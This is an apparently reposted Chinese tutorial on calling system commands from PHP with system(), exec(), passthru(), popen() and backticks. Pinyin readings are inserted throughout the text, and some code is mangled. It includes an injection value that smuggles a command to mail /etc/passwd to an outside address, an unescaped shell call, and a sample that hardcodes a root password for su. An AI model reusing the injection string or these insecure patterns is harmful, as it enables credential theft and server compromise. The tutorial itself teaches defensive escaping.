明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

PHP 中執(zhí)行系統(tǒng)外部命令

[摘要]PHP 中執(zhí)行系統(tǒng)外部命令PHP作為一種服務(wù)器端的腳本語言,象編寫簡單,或者是復(fù)雜的動態(tài)網(wǎng)頁這樣的任務(wù),它完全能夠勝任。但事情不總是如此,有時為了實現(xiàn)某個功能,必須借助于操作系統(tǒng)的外部程序(或者稱之為命令),這樣可以做到事半功倍。 那么,是否可以在PHP腳本中調(diào)用外部命令呢?如果能,如何去做呢?有...

PHP 中執(zhí)行系統(tǒng)外部命令PHP作為一種服務(wù)器端的腳本語言,象編寫簡單,或者是復(fù)雜的動態(tài)網(wǎng)頁這樣的任務(wù),它完全能夠勝任。但事情不總是如此,有時為了實現(xiàn)某個功能,必須借助于操作系統(tǒng)的外部程序(或者稱之為命令),這樣可以做到事半功倍。



那么,是否可以在PHP腳本中調(diào)用外部命令呢?如果能,如何去做呢?有些什么方面的顧慮呢?相信你看了本文后,肯定能夠回答這些問題了。



是否可以?



答案是肯定的。PHP和其它的程序設(shè)計語言一樣,完全可以在程序內(nèi)調(diào)用外部命令,并且是很簡單的:只要用一個或幾個函數(shù)即可。



前提條件



由于PHP基本是用于WEB程序開發(fā)的,所以安全性成了人們考慮的一個重要方面。于是PHP的設(shè)計者們給PHP加了一個門:安全模式。如果運行在安全模式下,那么PHP腳本中將受到如下四個方面的限制:



執(zhí)行外部命令

在打開文件時有些限制

連接MySQL數(shù)據(jù)庫

基于HTTP的認(rèn)證

在安全模式下,只有在特定目錄中的外部程序才可以被執(zhí)行,對其它程序的調(diào)用將被拒絕。這個目錄可以在php.ini文件中用safe_mode_exec_dir指令,或在編譯PHP是加上--with-exec-dir選項來指定,默認(rèn)是/usr/local/php/bin。



如果你調(diào)用一個應(yīng)該可以輸出結(jié)果的外部命令(意思是PHP腳本沒有錯誤),得到的卻是一片空白,那么很可能你的網(wǎng)管已經(jīng)把PHP運行在安全模式下了。



如何做?



在PHP中調(diào)用外部命令,可以用如下三種方法來實現(xiàn):



1) 用PHP提供的專門函數(shù)



PHP提供共了3個專門的執(zhí)行外部命令的函數(shù):system(),exec(),passthru()。



system()



原型:string system (string command [, int return_var])



system()函數(shù)很其它語言中的差不多,它執(zhí)行給定的命令,輸出和返回結(jié)果。第二個參數(shù)是可選的,用來得到命令執(zhí)行后的狀態(tài)碼。



例子:




system("/usr/local/bin/webalizer/webalizer");

?>



exec()



原型:string exec (string command [, string array [, int return_var]])



exec()函數(shù)與system()類似,也執(zhí)行給定的命令,但不輸出結(jié)果,而是返回結(jié)果的最后一行。雖然它只返回命令結(jié)果的最后一行,但用第二個參數(shù)array可以得到完整的結(jié)果,方法是把結(jié)果逐行追加到array的結(jié)尾處。所以如果array不是空的,在調(diào)用之前最好用unset()最它清掉。只有指定了第二個參數(shù)時,才可以用第三個參數(shù),用來取得命令執(zhí)行的狀態(tài)碼。



例子:




exec("/bin/ls -l");

exec("/bin/ls -l", $res);

exec("/bin/ls -l", $res, $rc);

?>



passthru()



原型:void passthru (string command [, int return_var])



passthru()只調(diào)用命令,不返回任何結(jié)果,但把命令的運行結(jié)果原樣地直接輸出到標(biāo)準(zhǔn)輸出設(shè)備上。所以passthru()函數(shù)經(jīng)常用來調(diào)用象pbmplus(Unix下的一個處理圖片的工具,輸出二進(jìn)制的原始圖片的流)這樣的程序。同樣它也可以得到命令執(zhí)行的狀態(tài)碼。



例子:




header("Content-type: image/gif");

passthru("./ppmtogif hunte.ppm");

?>



2) 用popen()函數(shù)打開進(jìn)程



上面的方法只能簡單地執(zhí)行命令,卻不能與命令交互。但有些時候必須向命令輸入一些東西,如在增加Linux的系統(tǒng)用戶時,要調(diào)用su來把當(dāng)前用戶換到root才行,而su命令必須要在命令行上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。



popen()函數(shù)打開一個進(jìn)程管道來執(zhí)行給定的命令,返回一個文件句柄。既然返回的是一個文件句柄,那么就可以對它讀和寫了。在PHP3中,對這種句柄只能做單一的操作模式,要么寫,要么讀;從PHP4開始,可以同時讀和寫了。除非這個句柄是以一種模式(讀或?qū)懀┐蜷_的,否則必須調(diào)用pclose()函數(shù)來關(guān)閉它。



例子1:




$fp=popen("/bin/ls -l", "r");

?>



例子2(本例來自PHP中國聯(lián)盟網(wǎng)站http://www.phpx.com/show.php?d=col&i=51):




/* PHP中如何增加一個系統(tǒng)用戶

下面是一段例程,增加一個名字為james的用戶,

root密碼是 verygood。僅供參考

*/

$sucommand = "su --login root --command";

$useradd = "useradd ";

$rootpasswd = "verygood";

$user = "james";

$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);

$fp = @popen($user_add,"w");

@fputs($fp,$rootpasswd);

@pclose($fp);

?>



3) 用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)



這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執(zhí)行的命令括起來作為一個表達(dá)式,這個表達(dá)式的值就是命令執(zhí)行的結(jié)果。如:




$res='/bin/ls -l';

echo '
'.$res.'
';

?>



這個腳本的輸出就象:



hunte.gif

hunte.ppm

jpg.htm

jpg.jpg

passthru.php



要考慮些什么?



要考慮兩個問題:安全性和超時。



先看安全性。比如,你有一家小型的網(wǎng)上商店,所以可以出售的產(chǎn)品列表放在一個文件中。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地址,然后把這個產(chǎn)品列表發(fā)給他們。假設(shè)你沒有使用PHP的mail()函數(shù)(或者從未聽說過),你就調(diào)用Linux/Unix系統(tǒng)的mail程序來發(fā)送這個文件。程序就象這樣:




system("mail $to < products.txt");

echo "我們的產(chǎn)品目錄已經(jīng)發(fā)送到你的信箱:$to";

?>



用這段代碼,一般的用戶不會產(chǎn)生什么危險,但實際上存在著非常大的安全漏洞。如果有個惡意的用戶輸入了這樣一個EMAIL地址:



'--bla ; mail someone@domain.com < /etc/passwd ;'



那么這條命令最終變成:



'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'



我相信,無論哪個網(wǎng)絡(luò)管理人員見到這樣的命令,都會嚇出一身冷汗來。



幸好,PHP為我們提供了兩個函數(shù):EscapeShellCmd()和EscapeShellArg()。函數(shù)EscapeShellCmd把一個字符串中所有可能瞞過Shell而去執(zhí)行另外一個命令的字符轉(zhuǎn)義。這些字符在Shell中是有特殊含義的,象分號(),重定向(>)和從文件讀入(<)等。函數(shù)EscapeShellArg是用來處理命令的參數(shù)的。它在給定的字符串兩邊加上單引號,并把字符串中的單引號轉(zhuǎn)義,這樣這個字符串就可以安全地作為命令的參數(shù)。



再來看看超時問題。如果要執(zhí)行的命令要花費很長的時間,那么應(yīng)該把這個命令放到系統(tǒng)的后臺去運行。但在默認(rèn)情況下,象system()等函數(shù)要等到這個命令運行完才返回(實際上是要等命令的輸出結(jié)果),這肯定會引起PHP腳本的超時。解決的辦法是把命令的輸出重定向到另外一個文件或流中,如:




system("/usr/local/bin/order_proc > /tmp/null &");

?>